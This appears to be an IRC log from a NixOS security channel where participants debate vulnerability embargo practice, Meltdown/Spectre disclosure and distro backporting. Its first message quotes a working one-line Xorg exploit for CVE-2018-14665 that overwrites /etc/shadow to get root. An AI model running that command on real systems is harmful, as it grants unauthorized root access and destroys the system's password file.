<pie__>
#CVE-2018-14665 - an LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
<ekleog>
I don't really understand that ML post… holding off the release would have been breaking the embargo
<ekleog>
which would completely break the idea of an embargo
<ekleog>
also, the idea of an embargo is to prepare a patch so that everyone gets them out at the same time, given OpenBSD had a maintainer in the Xorg team it means they could get the patch ASAP… so IMO the embargo did meet its purpose, even though 14 days is already pretty long for an embargo
<pie__>
1) idk 2) what about "there is a problem, I can't tell you what, but don't release yet"
<ekleog>
that's what led people to figuring out Meltdown & Spectre before the end of the embargo with the release of an exploit :)
<ekleog>
(well, granted, Meltdown & Spectre was *really* an ill-handled embargo)
<pie__>
hm
<pie__>
wasn't the patch out for those first?
<andi->
I am sick of people trying to be entitled to pre-disclosure information..
<gchristensen>
soo yes
<andi->
I like OpenBSD but this constant crying out...
* andi-
focuses on positive stuff
mmercier has joined #nixos-security
<ekleog>
pie__: well, Meltdown & Spectre is peculiar in that the embargo lasted months and some patches had already been pushed upstream during the embargo (like the KPTI patchset, that had been loudly ignored by Linus for years until the security community started agitating and Linux silently pushed them upstream without a single message on the list)
<ekleog>
really an ill-handled embargo
<ekleog>
but I can say with friends we were looking at this for like a week before the embargo was officially aborted :p
<ekleog>
(and the embargo has been aborted because someone released an exploit, iirc, and xen didn't have the patchset ready)
<pie__>
sounds messy :P
<ekleog>
the more I think about the more I think the only person in the embargo should really be the security researcher and the person in charge of writing a patch
<ekleog>
+it
<ekleog>
and ++s
<ekleog>
and then distros should handle backporting the patch and releasing once the embargo is removed -- but I guess the issue is for people like redhat or debian who backport years behind
<andi->
I think that might be dangerous.. For anyone not Debian or Red Hat/SUSE. Often enough there are subtle changes that have to get implemented. If you leave that to say us I would be worried about backporting it wrong..
<ekleog>
yeah, I think my position is too extreme too… but well, even backporting needs only be done once, it doesn't require the embargo to go to 17 distros with at least 2 people per distro plus some independent volunteers :/
<ekleog>
(and that's only considering embargoes upheld by distros@ standards, which are already the strictest I know of)
<ekleog>
ideally backporting would be done by the person who makes the patch themselves
<andi->
It starts with packaging and distributing stableish/LTS packages.
<andi->
Upstream then has a defined set of releases that might need a backport. If someone wants to support that longer than upstream they must do it themselves.. E.g. rustc in our releases
pie__ has quit [Ping timeout: 246 seconds]
mmercier has quit [Ping timeout: 276 seconds]
pie_ has joined #nixos-security
pie_ has quit [Remote host closed the connection]
pie_ has joined #nixos-security
ivan_ is now known as ivan
pie__ has joined #nixos-security
pie_ has quit [Ping timeout: 250 seconds]
mmercier has joined #nixos-security
mmercier has quit [Quit: mmercier]
pie__ has quit [Ping timeout: 272 seconds]
pie_ has joined #nixos-security
pie_ has quit [Remote host closed the connection]
pie_ has joined #nixos-security
pie_ has quit [Ping timeout: 240 seconds]
pie_ has joined #nixos-security
pie__ has joined #nixos-security
pie_ has quit [Client Quit]
pie_ has joined #nixos-security
pie__ has quit [Remote host closed the connection]